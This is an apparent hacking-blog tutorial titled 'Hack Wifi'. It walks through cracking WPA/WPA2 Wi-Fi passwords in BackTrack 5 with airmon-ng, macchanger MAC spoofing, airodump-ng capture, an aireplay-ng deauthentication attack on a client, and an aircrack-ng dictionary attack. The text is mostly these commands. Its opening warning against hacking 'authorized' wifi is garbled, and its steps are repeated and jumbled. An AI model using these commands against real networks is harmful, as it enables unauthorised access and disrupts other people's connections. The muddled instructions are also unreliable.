Warning:::::::Don't hack any authorized wifi otherwise you go to jail.
2. Then you create a virtual machine in your Vmware.
3.Then power on your machine.
4.And Now your all set to go...just simply follow below steps...now
Hack Wifi
Tools
Vmware Workstation(Download)
Backtrek 5 (Download)
Compatible Wifi Card (Optional)
Rules to follow
1.Now you First install a Vmware in your system.2. Then you create a virtual machine in your Vmware.
3.Then power on your machine.
4.And Now your all set to go...just simply follow below steps...now
Steps to Follow
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
airmon-ng start wlan0
(Optional) Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
Then, press "Ctrl+c
" to break the program.-
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.open another terminal.
*where -a is the BSSIDaireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
-c is the client MAC address (STATION)
Wait for the handshake
Use the John the Ripper as word list to crack the WPA/WP2 password aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs- You can use your own password wordlist. or You can download predefined Dictionaries from net.
- Keep visiting our Blog at https://www.myhackarena.blogspot.in